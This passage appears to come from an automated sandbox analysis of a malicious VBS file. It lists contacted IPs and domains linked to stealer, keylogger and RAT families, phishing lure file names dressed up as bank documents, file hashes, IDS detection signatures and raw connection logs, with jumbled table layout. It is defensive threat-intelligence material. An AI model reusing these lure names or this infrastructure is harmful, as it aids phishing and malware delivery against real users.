149.154.167.220 | EPTMAcgvNZ.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger |
149.154.167.220 | INV-0542.pdf.exe | malicious | GuLoader, Snake Keylogger |
149.154.167.220 | DJ5PhUwOsM.exe | malicious | AgentTesla, XWorm |
149.154.167.220 | 2ehwX6LWt3.exe | malicious | XWorm |
149.154.167.220 | Mzo6BdEtGv.exe | malicious | XWorm |
193.30.119.205 | New RFQ20241142.xls | malicious | FormBook, HTMLPhisher |
193.30.119.205 | Payment Advice.xls | malicious | Remcos, HTMLPhisher |
193.30.119.205 | Order Summary.xls | malicious | Remcos, HTMLPhisher |
193.30.119.205 | OC25-11-24.xls | malicious | Remcos, HTMLPhisher |
193.122.6.168 | RemittanceAdvice35282-17.xll.dll | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe | malicious | MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exe | malicious | MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWorm | checkip.dyndns.org/
193.122.6.168 | Halkbank_Ekstre_25112024 _073809_405251.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
193.122.6.168 | IMG-20241119-WA0006(162KB).Pdf.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.6.168 | ZEcVl5jzXD.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.6.168 | rrequestforquotation.exe | malicious | Snake Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip.3105.filemail.com | New RFQ20241142.xls | malicious | FormBook, HTMLPhisher | 193.30.119.205
ip.3105.filemail.com | Payment Advice.xls | malicious | Remcos, HTMLPhisher | 193.30.119.205
ip.3105.filemail.com | Order Summary.xls | malicious | Remcos, HTMLPhisher | 193.30.119.205
ip.3105.filemail.com | OC25-11-24.xls | malicious | Remcos, HTMLPhisher | 193.30.119.205
paste.ee | MT103-8819006.DOCS.vbs | malicious | Unknown | 172.67.187.200
paste.ee | Rooming list.js | malicious | Remcos | 104.21.84.67
paste.ee | segura.vbs | malicious | Remcos | 172.67.187.200
paste.ee | asegurar.vbs | malicious | AsyncRAT, DcRat | 104.21.84.67
paste.ee | PNSBt.js | malicious | AsyncRAT | 172.67.187.200
paste.ee | LETA_pdf.vbs | malicious | AsyncRAT, PureLog Stealer | 172.67.187.200
paste.ee | PO 2725724312_pdf.vbs | malicious | Unknown | 172.67.187.200
paste.ee | DEVIS_VALIDE.js | malicious | XWorm | 188.114.97.3
paste.ee | ce.vbs | malicious | Unknown | 188.114.97.3
paste.ee | download.exe | malicious | Remcos, XWorm | 188.114.97.3
reallyfreegeoip.org | PACKING_LIST_DOCUMENT_BQG9390309727.scr.exe | malicious | MassLogger RAT, PureLog Stealer | 172.67.177.134
reallyfreegeoip.org | RemittanceAdvice35282-17.xll.dll | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
reallyfreegeoip.org | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe | malicious | MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger | 172.67.177.134
reallyfreegeoip.org | F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exe | malicious | MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger | 172.67.177.134
reallyfreegeoip.org | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe | malicious | AgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWorm | 172.67.177.134
reallyfreegeoip.org | Halkbank_Ekstre_25112024 _073809_405251.exe | malicious | Snake Keylogger | 104.21.67.152
reallyfreegeoip.org | INV-0542.pdf.exe | malicious | GuLoader, Snake Keylogger | 172.67.177.134
reallyfreegeoip.org | jbuESggTv0.exe | malicious | Snake Keylogger |
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      tJzfnaqOxj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      ORACLE-BMC-31898USRemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 158.101.44.242
                                                                                                                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 158.101.44.242
                                                                                                                                                                      F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 193.122.6.168
                                                                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                                                                                                      • 193.122.6.168
                                                                                                                                                                      Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 193.122.6.168
                                                                                                                                                                      jbuESggTv0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 158.101.44.242
                                                                                                                                                                      tJzfnaqOxj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 193.122.130.0
                                                                                                                                                                      LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 193.122.130.0
                                                                                                                                                                      la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 193.123.91.33
                                                                                                                                                                      November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                      • 193.122.130.0
                                                                                                                                                                      TELEGRAMRURemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      INVITATION TO BID as on 25 NOV 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      EPTMAcgvNZ.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      2ehwX6LWt3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Mzo6BdEtGv.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      DFNVereinzurFoerderungeinesDeutschenForschungsnetzeseNew RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      fbot.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                      • 141.14.194.207
                                                                                                                                                                      fbot.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                      • 132.252.36.195
                                                                                                                                                                      la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 129.217.110.41
                                                                                                                                                                      la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 141.33.15.156
                                                                                                                                                                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 141.65.107.191
                                                                                                                                                                      la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 139.6.130.67
                                                                                                                                                                      OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      UK2NET-ASGBloligang.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 80.209.188.4
                                                                                                                                                                      ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 45.80.158.23
                                                                                                                                                                      8UUxoKYpTx.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 173.244.199.148
                                                                                                                                                                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 83.170.86.99
                                                                                                                                                                      D6wsFZIM58.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 77.92.65.63
                                                                                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 77.92.65.81
                                                                                                                                                                      vEOTtk6FeG.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 77.92.77.76
                                                                                                                                                                      QoN2q1e0vd.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 77.92.90.86
                                                                                                                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 173.244.199.122
                                                                                                                                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                      • 77.92.65.54
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adPACKING_LIST_DOCUMENT_BQG9390309727.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      Halkbank_Ekstre_25112024 _073809_405251.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      jbuESggTv0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      tJzfnaqOxj.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eTransferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      DHL-SHIPMENT-DOCUMENT-BILL-OF-LADING-PACKING-LIST.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      F#U0130YAT L#U0130STES#U0130 VE TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                      • 193.30.119.205
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
• 193.30.119.205
• 149.154.167.220
Halkbank_Ekstre_25112024 _073809_405251.exe | malicious | Snake Keylogger
• 193.30.119.205
• 149.154.167.220
a0e9f5d64349fb13191bc781f81f42e1FHG538JGH835DG86S.doc | malicious | Unknown
• 104.21.84.67
RemittanceAdvice35282-17.xll.dll | malicious | Snake Keylogger, VIP Keylogger
• 104.21.84.67
file.exe | malicious | LummaC Stealer
• 104.21.84.67
file.exe | malicious | Unknown
• 104.21.84.67
EPTMAcgvNZ.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger
• 104.21.84.67
AWkpqJMxci.exe | malicious | Remcos, DBatLoader
• 104.21.84.67
D2pQ4J4GGZ.exe | malicious | Remcos, DBatLoader
• 104.21.84.67
C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer
• 104.21.84.67
2jbMIxCFsK.exe | malicious | AgentTesla, DBatLoader
• 104.21.84.67
9oKqST-uPDy7iigkXM-C5J2.eml | malicious | Unknown
• 104.21.84.67
No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 9434
Entropy (8bit): 4.928515784730612
Encrypted: false
SSDEEP: 192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5: D3594118838EF8580975DDA877E44DEB
SHA1: 0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256: 456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512: 103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllulp77th:NllU
MD5: 7B5F360646F3167812DC4ADF7B166512
SHA1: F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
SHA-256: 672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
SHA-512: 7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e.................................x..............@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type: Unicode text, UTF-16, little-endian text, with very long lines (583), with CRLF line terminators
Entropy (8bit): 3.8278091745240843
TrID:
• Text - UTF-16 (LE) encoded (2002/1) 64.44%
• MP3 audio (1001/1) 32.22%
• Lumena CEL bitmap (63/63) 2.03%
• Corel Photo Paint (41/41) 1.32%
File name: Doc261124.vbs
File size: 12'984 bytes
MD5: 3e9ccaacccb792299a0b1c12b537817e
SHA1: 4f2707cf3bc5216ab4e41265c00a9264edb3edd6
SHA256: 5a813cfc61c2b1c738d0c5785812dc28f461631a70d98b970fc9810f709dbd94
SHA512: aa45151a19fcc6abc57c0223cc741dcd271083153bf960df9a291cb8b4ec7737916652b3a8f7065e20a27ee2544e38839e0bb8e8ceb722e108ea13421d3dc826
SSDEEP: 192:aeyyqW7XqvgA8ECXXgxQBWMb91LLf5yyfUeLwVwwybyYkpucH2gkSCXXZMnrMDPr:+IvYWgymMDPPmZOtBOWeu8GHRk8/
TLSH: 29429F16A3EA4608F2F31F29A87651684E37BE166D78D25D02AC580E0FF3E44D934B73
File Content Preview: ..........F.u.n.c.t.i.o.n. .a.p.a.n.i.c.a.r.(.p.r.i.n.t.T.i.c.k.e.t.,. .s.c.r.i.p.t.C.o.n.t.e.x.t.,. .p.r.i.n.t.C.a.p.a.b.i.l.i.t.i.e.s.)..... . . . .D.i.m. .d.u.n.a.,. .l.e.u.c.t.r.a.s..... . . . .S.e.t. .d.u.n.a. .=. .p.r.i.n.t.C.a.p.a.b.i.l.i.t.i.e.s..
Icon Hash: 68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-26T09:32:42.115660+0100 | 2057635 | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound | 1 | 5.182.211.149 | 80 | 192.168.2.8 | 49711 | TCP
2024-11-26T09:32:42.115660+0100 | 2858295 | ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) | 1 | 5.182.211.149 | 80 | 192.168.2.8 | 49711 | TCP
2024-11-26T09:32:50.785311+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 104.21.84.67 | 443 | TCP
2024-11-26T09:33:01.135577+0100 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 193.30.119.205 | 443 | 192.168.2.8 | 49707 | TCP
2024-11-26T09:33:21.237828+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49712 | 193.122.6.168 | 80 | TCP
2024-11-26T09:33:24.003462+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49712 | 193.122.6.168 | 80 | TCP
2024-11-26T09:33:25.683925+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49714 | 172.67.177.134 | 443 | TCP
2024-11-26T09:33:27.222225+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49715 | 193.122.6.168 | 80 | TCP
2024-11-26T09:33:41.335289+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49724 | 172.67.177.134 | 443 | TCP
2024-11-26T09:33:47.793673+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49728 | 172.67.177.134 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 09:32:48.144557953 CET | 49705 | 80 | 192.168.2.8 | 104.21.84.67
Nov 26, 2024 09:32:48.264918089 CET | 80 | 49705 | 104.21.84.67 | 192.168.2.8
Nov 26, 2024 09:32:48.265012026 CET | 49705 | 80 | 192.168.2.8 | 104.21.84.67
Nov 26, 2024 09:32:48.265235901 CET | 49705 | 80 | 192.168.2.8 | 104.21.84.67
Nov 26, 2024 09:32:48.385272026 CET | 80 | 49705 | 104.21.84.67 | 192.168.2.8
Nov 26, 2024 09:32:49.490083933 CET | 80 | 49705 | 104.21.84.67 | 192.168.2.8
Nov 26, 2024 09:32:49.545972109 CET | 49705 | 80 | 192.168.2.8 | 104.21.84.67
Nov 26, 2024 09:32:49.556854963 CET | 49706 | 443 | 192.168.2.8 | 104.21.84.67
Nov 26, 2024 09:32:49.556911945 CET | 443 | 49706 | 104.21.84.67 | 192.168.2.8
Nov 26, 2024 09:32:49.556997061 CET | 49706 | 443 | 192.168.2.8 | 104.21.84.67
Nov 26, 2024 09:32:49.567167997 CET | 49706 | 443 | 192.168.2.8 | 104.21.84.67
Nov 26, 2024 09:32:49.567186117 CET | 443 | 49706 | 104.21.84.67 | 192.168.2.8
Nov 26, 2024 09:32:49.666966915 CET | 80 | 49705 | 104.21.84.67 | 192.168.2.8
Nov 26, 2024 09:32:49.667015076 CET | 49705 | 80 | 192.168.2.8 | 104.21.84.67
Nov 26, 2024 09:32:50.785228014 CET | 443 | 49706 | 104.21.84.67 | 192.168.2.8
Nov 26, 2024 09:32:50.785310984 CET | 49706 | 443 | 192.168.2.8 | 104.21.84.67
Nov 26, 2024 09:32:50.787592888 CET | 49706 | 443 | 192.168.2.8 | 104.21.84.67
Nov 26, 2024 09:32:50.787597895 CET | 443 | 49706 | 104.21.84.67 | 192.168.2.8
Nov 26, 2024 09:32:50.787873983 CET | 443 | 49706 | 104.21.84.67 | 192.168.2.8
Nov 26, 2024 09:32:50.831604958 CET | 49706 | 443 | 192.168.2.8 | 104.21.84.67
Nov 26, 2024 09:32:50.840276003 CET | 49706 | 443 | 192.168.2.8 | 104.21.84.67
Nov 26, 2024 09:32:50.883368015 CET | 443 | 49706 | 104.21.84.67 | 192.168.2.8
Nov 26, 2024 09:32:51.293695927 CET | 443 | 49706 | 104.21.84.67 | 192.168.2.8
Nov 26, 2024 09:32:51.293802023 CET | 443 | 49706 | 104.21.84.67 | 192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.293840885 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.293849945 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.293858051 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.293912888 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.293922901 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.293926954 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.293957949 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.302666903 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.347172976 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.347177982 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.394021034 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.394026995 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.414207935 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.414309025 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.414320946 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.456960917 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.456967115 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.489492893 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.489559889 CET49706443192.168.2.8104.21.84.67
                                                                                                                                                                      Nov 26, 2024 09:32:51.489564896 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.497802973 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.497840881 CET44349706104.21.84.67192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:51.497862101 CET49706443192.168.2.8104.21.84.67
